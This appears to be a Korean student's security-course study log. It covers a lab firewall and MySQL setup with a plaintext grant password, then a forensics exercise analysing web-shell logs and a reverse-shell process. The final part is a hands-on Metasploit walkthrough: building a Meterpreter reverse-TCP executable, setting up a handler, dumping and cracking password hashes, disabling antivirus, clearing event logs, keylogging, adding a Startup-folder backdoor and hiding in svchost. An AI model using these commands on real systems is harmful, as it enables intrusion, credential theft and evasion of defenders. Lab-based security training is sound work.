- 2024.06.10.보안 day452024년 06월 10일 09시 13분 27초에 업로드 된 글입니다.작성자: 202401to07
rocky
20.20.20.20 vm2
mini
ens33 : 192.168.30.170
ens32 : 20.20.20.254 vm2
[root@localhost ~]# firewall-cmd --query-masquerade (확인)
no
[root@localhost ~]# firewall-cmd --add-masquerade --permanent (NAT설정)
success
[root@localhost ~]# firewall-cmd --reload
success
[root@localhost ~]# firewall-cmd --query-masquerade20.20.20.20)
create database sevas;
use sevas;게시판 DB
create table b_tb(
b_no int unsigned auto_increment not null,
subject char(100) not null,
user char(20) not null,
contents text not null,
reg_date datetime,
index(b_no),
unique key no(b_no));
회원가입 DB
create table class (
c_no int unsigned auto_increment not null,
id char(40) not null,
pw char(40) not null,
nick varchar(40) not null,
date datetime not null,
primary key(c_no),
unique key sevas2(c_no,id));
파일 업로드 DB
file DB
create table file_tb(
file_no int not null auto_increment,
file_name char(255) not null,
reg_date datetime,
file_own char(20),
file_size char(10),
primary key(file_no));grant all privileges on sevas.* to admin@'192.168.30.170' identified by 'asd123' with grant option;
grant all privileges on sevas.* to admin@'http://www.sevas10.com' identified by 'asd123' with grant option;
grant all privileges on sevas.* to admin@'_gateway' identified by 'asd123' with grant option;
flush privileges;
firewall-cmd --permanent --add-port 3306/tcp
firewall-cmd --reload
30.170)
이벤트예약 웹사이트를 운영하고 있는 "깜짝이야"사의 관리자 앞으로 한통의 협박 메일이 도착했다.
당장 10억을 입금하지 않으면, 확보한 자사의 웹페이지 소스코드를 모두 공개할 것이며, 추가적인 위협을 가하겠다는 내용이다.
관리자는 포렌식 전문가인 당신에게 침해사고 분석을 의뢰하였다.
침해된 시스템에 남겨진 흔적과 각종 로그 파일을 분석하여 다음 사항을 밝혀내시오.
A. 공격자가 웹페이지 소스코드를 유출한 시간(UTC+09:00)은?(yyyy-MM-dd_hh:mm:ss)
B. 리버스쉘(Reverse Shell)을 동작시키는 프로세스 ID(PID)는? (10진수)
C. 리버스쉘(Reverse Shell)에 대한 공격자 주소(IP)는?
admin01:x:1000:1000:admin01,,,:/home/admin01:/bin/bash
dev:x:1001:1001:,,,:/home/dev:/bin/bash
ahnlab:x:1002:1002:,,,:/home/ahnlab:/bin/bash
admin01 tty1 Mon Aug 27 10:08:28 +0900 2012
dev pts/0 192.168.184.161 Mon Aug 27 10:11:09 +0900 2012
ahnlab pts/1 192.168.184.136 Mon Aug 27 10:14:54 +0900 2012
192.168.184.161 ether 00:0c:29:b4:60:b3 C eth0
192.168.184.136 ether 00:0c:29:43:2f:5c C eth0
tcp 0 0 192.168.184.162:22 192.168.184.161:1106 ESTABLISHED
tcp 0 0 192.168.184.162:22 192.168.184.161:1105 ESTABLISHED
tcp 0 0 192.168.184.162:52634 144.206.162.21:80 ESTABLISHED
tcp 0 52 192.168.184.162:22 192.168.184.136:1122 ESTABLISHED
tcp 0 0 192.168.184.162:22 192.168.184.136:1120 ESTABLISHED
www-data 5244 814 0 10:11 ? 00:00:00 sh -c php -f /var/www/upload/editor/image/reverse.php : 셸에서 명령어로 PHP 스크립트를 실행
www-data 5245 5244 0 10:11 ? 00:00:00 php -f /var/www/upload/editor/image/reverse.php : 직접적으로 PHP 스크립트를 실행
www-data 5247 5245 0 10:11 ? 00:00:00 sh -c /bin/sh -i <&3 >&3 2>&3 :
www-data 5248 5247 0 10:11 ? 00:00:00 /bin/sh -i : 리버스쉘을 실행
www-data 5249 802 0 10:11 ? 00:00:00 /usr/sbin/apache2 -k start
: 시작 시간과 활동이 동시에 발생= 리버스쉘을 실행하는 활동으로 해석
www-data 5250 802 0 10:11 ? 00:00:00 /usr/sbin/apache2 -k start
112.216.97.27 - - [25/Aug/2012:17:18:32 +0900] "GET /upload/editor/image/cmd.php HTTP/1.1" 294 311 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
112.216.97.29 - - [25/Aug/2012:17:18:51 +0900] "GET /upload/editor/image/cmd.php?cmd=cHdk HTTP/1.
112.216.97.29 - - [25/Aug/2012:17:19:23 +0900] "GET /upload/editor/image/cmd.php?cmd=bHMgLWFsICAvdmFyL3d3dy91cGxvYWQvZWRpdG9yL2ltYWdlLw%20%20 HTTP/1.1" 200 13318 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
=> ls -al /var/www/upload/editor/image/
112.216.97.29 - - [25/Aug/2012:17:21:12 +0900] "GET /upload/editor/image/cmd.php?cmd=dGFyIC1jdmYgL3Zhci93d3cvdXBsb2FkL2VkaXRvci9pbWFnZS8xMzMwNjY0ODM4IC92YXIvd3d3Lw%20%20 HTTP/1.1" 200 14541 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
=> tar -cvf /var/www/upload/editor/image/1330664838 /var/www/
112.216.97.29 - - [25/Aug/2012:17:26:40 +0900] "GET /upload/editor/image/cmd.php?cmd=cGhwIC1mIC92YXIvd3d3L3VwbG9hZC9lZGl0b3IvaW1hZ2UvcmV2ZXJzZS5waHA%20 HTTP/1.1" 200 294 "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
=> php -f /var/www/upload/editor/image/reverse.php
=> 공격 시간은 [25/Aug/2012:17:26:40 +0900]
==> pc의 ip는 192.168.184.162
==> dev ssh
==> ahnlab web
==> cmd.php
==> 공격자의 ip는 112.216.97.29 :
==> https://www.base64decode.org/ 에서 넣고 == 추가하면 해석됨
따라서, 공격자가 웹페이지 소스코드를 유출한 시간(UTC+09:00)은?(yyyy-MM-dd_hh:mm:ss) 10:11
따라서 , 리버스쉘(Reverse Shell)을 동작시키는 프로세스 ID(PID)는? 5248
따라서, 리버스쉘(Reverse Shell)에 대한 공격자 주소(IP)는? 112.216.97.29
메타스플로잇 Metasploit
msfvenom <=========명령어툴
msfconsole <=========터미널툴apt-get install cifs-utils : cifs패키지설치
mount -t cifs //192.168.30.27/0_share /mount
msfvenom -l payloads
msfvenom -l payloads |grep windows/x64/meterpreter
msfvenom -l payloads |grep -i ios
cd /root
rm -rf *msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.171 lport=4444 -f exe -o sevas171.exe : 만듦
ll
cp -a sevas171.exe /mountsearch handler
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.30.171
lhost => 192.168.30.171
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > show optionsmsf6 exploit(multi/handler) > exploit : 실행되면 만든 0_share 의 sevas171.exe 더블클릭
가장 중요한 기능은 run winenum이다 모든 정보를 수집함 (run scraper)
Getsystem 시스템권한획득
Run post/windows/gather/hashdump (사용중인 계정 패스워드 해시값 도출)
복사해서 john --format=NT sevas
Run getgui -e 원격데스크탑 기능 강제 활성화
Clearev 이벤트로그 지우기
Run getgui -u sevas -p 1234 원격 계정 생성
Run killav 백신 프로그램 끄기
Run getcountermeasure 보안수단 비활성화keyscan_start
keyscan_dump
Dumping captured keystrokes...
202406100440test<^S>execute -f notepad.exe
download "c:\windows\system32\cmd.exe" : 파일 받기
cd "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu" : 이 위치에
upload sevas171.exe : 파일 올리기
migrate -N svchost.exe : 이 파일에 숨기
서로 연결하기
session -i 번호
'보안' 카테고리의 다른 글
2024.06.11.보안 day46 (0) 2024.06.11 HTTPS HTTP (1) 2024.06.10 2024.06.07.보안 day44 (0) 2024.06.10 2024.06.05.보안 day43 (0) 2024.06.09 2024.06.04.보안 day42 (0) 2024.06.04 이전글이 없습니다.댓글